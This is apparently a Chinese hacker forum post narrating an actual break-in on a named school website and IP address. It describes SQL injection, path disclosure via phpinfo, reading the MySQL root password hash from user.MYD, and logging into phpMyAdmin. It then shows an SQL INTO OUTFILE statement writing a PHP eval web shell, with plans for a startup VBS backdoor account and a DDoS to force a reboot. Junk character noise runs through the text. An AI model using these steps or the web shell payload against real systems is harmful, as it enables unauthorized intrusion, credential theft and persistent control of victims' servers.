第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏* h: b$ Y5 V/ q; R+ N9 [0 C4 ^
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
3 s# Z) H, }. u& C
) Q) b) M* u6 C- Q* @7 C8 j+ L3 G. s9 U
( a7 X% Z! v0 {. p- F& m* `5 W
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
: Q) a. T6 `* @& r6 o8 K" n( e
- O0 k0 ~) R. p/ w: Y% x7 z$ a& c那么想可以直接写入shell ,getshell有几个条件:
# r% K1 l8 w. D% T& G6 Z1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
" n, k3 X. L1 l; v+ c. d4 i2 }' G; M, T* C1 ~; |, H+ e: C. t
试着爆绝对路径: 8 @$ b( H0 u* w+ I6 |
1./phpMyAdmin/index.php?lang[]=1 6 L6 S7 m6 T4 D4 J2 W& b. ?! S
2./phpMyAdmin/phpinfo.php
, b8 s/ n6 w3 |, u* [3./load_file()
+ I6 s" \" [: B+ T- r4./phpmyadmin/themes/darkblue_orange/layout.inc.php
, {- o" a1 J3 ~4 s- I: o7 j8 Y V5./phpmyadmin/libraries/select_lang.lib.php
: j- N6 ]3 y* E6./phpmyadmin/libraries/lect_lang.lib.php 8 U, P% \! s; y! K# u( d
7./phpmyadmin/libraries/mcrypt.lib.php " Z+ v7 u. L2 a& L
8./phpmyadmin/libraries/export/xls.php
; A; m$ J- r8 h7 G# _; p
3 k% C& q$ ]5 V均不行...........................
7 ^1 a/ r$ f# K% \' t/ h6 Q2 G6 {% Y, _! {' H" Y6 B" M2 G
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php " a6 Z' `3 j! C
& W8 W# p7 j1 F/ ]; X权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
6 e. Q/ `* S: D' o+ A7 e* |6 k5 y
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 1 z/ w2 O5 j1 n! Y! V/ d
& ?+ B& s. v; Y; R% U( o敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
6 u& P( b! S& N) {/ R s1 [/ Z! ]! u: M5 i0 a i8 o
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
6 I8 y8 a! r( i6 O7 m' J& ]0 \1 N9 }6 @# ]- L+ E1 t
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini ( i8 ~2 X/ ]6 O
1 H Z: U6 n9 v自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
1 M, p; c4 M$ {7 r+ t% S$ w0 n' | B) \
成功读到root密码: - E$ v! a- X5 f0 T
( J; Y( B1 P+ w- z2 f) x
17---- r(0072)
# Y [8 @$ q* a" b9 x18---- o(006f) 8 S$ M f( R( K" m
19---- o(006f) $ a- e0 @6 z* ] r
20---- t(0074) & O0 Y& U7 w, h. V4 t, L7 V
21---- *(002a) % E* N/ i, [: g3 M- j* _
22---- 8(0038)
+ `1 c3 G* H9 I5 X# y; K23---- 2(0032)
% z. d& m. q7 w. r) ?24---- E(0045)
! B5 i8 H1 t/ y) U( q+ y4 b2 P8 |25---- 1(0031) ! F; m8 E9 V% M; @0 \& l
26---- C(0043) % k$ g. Y! N% u
27---- 5(0035) 1 e7 e1 L* l4 q7 ^5 H
28---- 8(0038)
/ s5 s7 r. S1 {" |& Y- y3 I9 Y7 H' e8 [29---- 2(0032) ( b4 a: L+ `6 {( L" y& t3 K
30---- 8(0038)
" I: W0 a- l! _31---- A(0041)
1 r7 \% E9 ^) w9 Q( i32---- 9(0039)
, L) ]! N' Z4 o; J33---- B(0042) 5 q% G! H/ @! Z4 c
34---- 5(0035)
/ Q4 Q* ]' ^, \4 e- d35---- 4(0034)
# z0 m2 ~" T% q8 D1 Z2 z+ E: }, ^: r A36---- 8(0038) 0 I, t+ X! T4 C5 I% t
37---- 6(0036) $ h" p/ y; Y/ v/ P) d# O, w# S
38---- 4(0034) # t0 a [) q6 ]: B5 |, u: W" e/ W
39---- 9(0039)
- j( ]8 ^( F" z* q9 L40---- 1(0031)
' E; B9 Z8 J Y' T41---- 1(0031)
9 d$ c" a( c# a) s9 L42---- 5(0035) + u8 `3 s: y. d2 f s0 K" A- s& ?: P
43---- 3(0033) % [+ l# f0 m, r4 A
44---- 5(0035) ) i/ W( ?; `8 G: g! O0 t4 d/ S
45---- 9(0039)
% @9 R, f1 E! t$ x2 G% ~9 w7 J46---- 8(0038) ; O8 B7 G9 [( I, W( P% _$ g! ?
47---- F(0046)
3 ^6 e3 o! ?( O$ m48---- F(0046)
# f& I( U Z) b; [3 u0 e49---- 4(0034)
8 L$ z7 l2 |8 k( a3 S/ {50---- F(0046)
9 ^& o5 k! D; k. J51---- 0(0030)
- |9 U5 T. N" u' X Q52---- 3(0033)
" E2 R) S, u8 D1 K( ]* u0 }53---- 2(0032)
0 Q+ a- U4 k5 [, |8 j* s( B54---- A(0041) 2 ]6 H) Z( W" p( K: M
55---- 4(0034) 6 g( ?3 H5 f9 B3 j% ]
56---- A(0041)
6 b1 L8 W) {, ^57---- B(0042)
3 P& Q+ P" `* T: u- Q) p58---- *(0044) , F7 a& a& \/ N( [4 j
59---- *(0035) 1 A: N- F! B, n; [+ E8 n
60---- *(0041) , M; g4 i$ A: e( n. o# {; R1 f
61---- *0032) ; I/ H g; i) @5 ~8 ^0 Y
% d+ ?( h5 K# [7 ^! R# A( K
解密后成功登陆phpmyamin 6 l6 A! l6 K- g4 @5 O
3 m W7 x. I# E3 y1 B
# h! g6 a5 _$ C" \2 D8 ~ , m `+ D8 V4 T3 Y0 \& { ?
m: }& X7 ~; X% U/ y
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' 1 E M& p: R' I) e! \3 ^
0 O+ D% ^% m+ A& W; l; S2 Q' g' k成功执行,拿下shell,菜刀连接: 7 g. T4 G2 [3 o* o7 {. t4 E# C( n
" p) |" c! H5 H) E2 A; \服务器不支持asp,aspx,php提权无果...................
8 R3 n/ o7 c5 T9 e" B
8 {/ \1 H9 u$ a8 f0 g但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
: ?/ C/ L0 Y) I) h* q" t服务器上已经有个隐藏帐号了
/ K) X8 A) K6 t别名 administrators( D( A+ _$ @; Q& h1 Q% q
注释 管理员对计算机/域有不受限制的完全访问权
/ [4 \" A9 X& V, y. l, b; P( q4 i成员
) v* @5 m, \- N2 d2 n-------------------------------------------------------------------------------
; T. Q/ H+ }) O/ F5 H8 yadmin7 }( M0 s1 t4 `- ^- o
Administrator
7 Z) ^- a3 r0 i9 sslipper$
& ]9 j7 [% c6 osqluser' b" ]2 b. |# F' N5 {. p
命令成功完成。 * K8 L9 N! {4 \0 s5 P) j9 l
) m* \9 e4 z6 k6 y3 G# E/ r; }
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。. p) j- }! Y7 e% m
" [, N1 n2 n, a$ tddos服务器重启,不然就只能坐等服务器重启了...............................4 m6 |7 C7 ~) s/ t' t. i7 S0 C
/ U# s$ P) O+ C- a4 I4 t
' r: t5 \; c+ k5 o* l* }1 x$ { |